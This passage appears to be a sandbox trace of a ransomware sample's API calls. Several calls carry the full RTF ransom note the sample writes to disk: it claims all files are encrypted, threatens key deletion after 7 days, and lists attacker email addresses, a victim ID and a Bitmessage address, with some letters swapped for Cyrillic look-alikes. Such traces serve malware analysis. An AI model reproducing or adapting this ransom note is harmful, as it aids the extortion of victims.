ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.479] WriteFile (in: hFile=0x2f0, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.480] CloseHandle (hObject=0x2f0) returned 1 [0286.480] 